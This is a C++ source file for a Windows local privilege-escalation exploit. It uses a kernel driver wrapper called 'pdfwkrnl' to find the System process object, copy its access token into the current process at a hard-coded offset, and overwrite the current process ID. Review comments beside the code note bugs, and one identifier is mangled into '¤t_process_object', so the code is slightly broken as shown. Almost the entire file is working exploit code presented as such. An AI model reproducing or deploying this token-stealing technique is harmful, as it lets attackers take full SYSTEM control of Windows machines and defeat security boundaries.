#include "PdFwKrnl.h"
// User-mode mirror of the kernel's EX_FAST_REF: a single 8-byte word that is
// viewed either as an object pointer, as its raw 64-bit value, or as the 4-bit
// RefCnt field overlaid on the low bits. All three members alias the same storage.
struct _EX_FAST_REF {
    union {
        VOID* Object;           // pointer view of the word
        ULONGLONG RefCnt : 4;   // low 4 bits, overlaid on the pointer
        ULONGLONG Value;        // raw integer view
    };
};
typedef _EX_FAST_REF EX_FAST_REF;
typedef _EX_FAST_REF* PEX_FAST_REF;
// Entry point. Attaches to the driver through the pdfwkrnl wrapper, then performs a
// sequence of kernel reads/writes against two process objects (PID 4 and the current
// process). Every read/write goes through pdfwkrnl; on any failure the program
// bails out via pdfwkrnl::detach(), whose return value becomes the exit status.
// STR() comes from the included header; its effect is not visible here.
int main(void) {
    if (!pdfwkrnl::attach()) {
        printf(STR("failed to attach to driver \n"));
        return -1;
    }

    // Out-pointers filled by PsLookupProcessByProcessId (returns PEPROCESS).
    PVOID* ntoskrnl_object = nullptr;
    PVOID* current_process_object = nullptr;
    uint64_t current_process_pid = GetCurrentProcessId();
    uint64_t ntoskrnl_pid = 4;
    EX_FAST_REF ntoskrnl_token{};
    EX_FAST_REF current_process_token{};

    printf(STR("starting exploit \n"));

    printf(STR("getting ntoskrnl object \n"));

    // NOTE(review): the NTSTATUS result is discarded; success is inferred only from the
    // out-pointer being non-null. No matching ObDereferenceObject is visible in this
    // listing, so the reference taken here is never released.
    pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
    if (!ntoskrnl_object) {
        printf(STR("failed to obtain ntoskrnl object \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);

    printf(STR("getting ntoskrnl token \n"));

    // 0x4b8 is a hard-coded field offset into the process object. It is not validated
    // against the running kernel build; on a build with a different layout this read
    // (and the later writes at the same offset) land on an unrelated field.
    ntoskrnl_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)ntoskrnl_object + 0x4b8);
    if (!ntoskrnl_token.Object) {
        printf(STR("failed to obtain ntoskrnl token \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);

    // NOTE(review): %d with a 64-bit argument is a printf format/argument mismatch.
    printf(STR("current process pid %d \n"), current_process_pid);
    printf(STR("ntoskrnl pid %d \n"), 4);

    printf(STR("getting current process object \n"));

    // NOTE(review): "¤t_process_object" reads as a listing encoding artifact; compare
    // the parallel call above. Same discarded-NTSTATUS / unreleased-reference caveat.
    pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, ¤t_process_object);
    if (!current_process_object) {
        printf(STR("failed to obtain current process object \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("obtained current process object @ %p \n"), current_process_object);

    printf(STR("getting current process token \n"));

    // Read only to confirm the field is populated; the value itself is never used again.
    current_process_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
    if (!current_process_token.Object) {
        printf(STR("failed getting current process token \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("overwriting current process token with ntoskrnl's token \n"));

    // The whole EX_FAST_REF is copied verbatim (all 8 bytes), not just the pointer.
    if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
        printf(STR("failed overwriting current process token \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("checking if overwrite was success \n"));

    // Read-back verification compares only the Object member.
    EX_FAST_REF current_process_token_temp = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
    if (current_process_token_temp.Object != ntoskrnl_token.Object) {
        printf(STR("failed overwriting current process token \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("token was successfully overwriten \n"));

    printf(STR("overwriting current process's pid to ntoskrnl's \n"));

    // 0x440 is a second hard-coded, unvalidated field offset (see the note at 0x4b8).
    if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
        printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("checking if current process's pid was overwriten \n"));

    if (pdfwkrnl::read<uint64_t>((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
        printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
        return pdfwkrnl::detach();
    }

    printf(STR("pid was successfully overwriten \n"));

    printf(STR("hello to two ntoskrnl's lol \n"));

    printf(STR("exploit complete bye (: \n"));

    printf(STR("enter to exit \n"));

    // Blocks until a key press so the modified state is observable before detaching.
    getchar();

    // NOTE(review): the exit status on every path is whatever detach() returns, so a
    // failed run is not distinguishable from a successful one by exit code.
    return pdfwkrnl::detach();
}